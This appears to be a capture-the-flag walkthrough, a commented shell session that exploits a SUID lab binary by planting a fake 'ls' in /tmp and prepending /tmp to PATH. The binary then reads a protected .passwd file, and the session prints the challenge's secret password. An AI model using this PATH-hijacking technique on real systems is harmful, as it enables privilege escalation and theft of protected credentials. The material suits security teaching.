# Run a simple ls -ls
app-script-ch11@challenge02:~$ ls -la
total 24
dr-xr-x---  2 app-script-ch11-cracked app-script-ch11         4096 Aug 11  2015 .
drwxr-xr-x 18 root                    root                    4096 Aug  7 22:08 ..
-r--r-----  1 app-script-ch11-cracked app-script-ch11-cracked   14 Feb  8  2012 .passwd
-r-sr-x---  1 app-script-ch11-cracked app-script-ch11         7160 Aug 11  2015 ch11
-r--r-----  1 app-script-ch11         app-script-ch11          153 Aug 11  2015 ch11.c
# We see that ch11 has SUID and this is our way in

# We run strings to see what it calls but the source code was given so there was no need
app-script-ch11@challenge02:~$ strings ch11
ls /challenge/app-script/ch11/.passwd
# We will see that it uses ls and this is our way in

# We will create our own ls ;)
# This creat our own ls in the /tmp folder
app-script-ch11@challenge02:~$ echo 'cat /challenge/app-script/ch11/.passwd' > /tmp/ls;

# This will give it execute rights
app-script-ch11@challenge02:~$ chmod +x /tmp/ls;

# We will add /tmp to the $PATH varible
app-script-ch11@challenge02:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/opt/tools/checksec/
app-script-ch11@challenge02:~$ export PATH=/tmp:$PATH;
app-script-ch11@challenge02:~$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/opt/tools/checksec/

# We run it and it gives us our password.
app-script-ch11@challenge02:~$ ./ch11
!oPe96a/.s8d5
app-script-ch11@challenge02:~$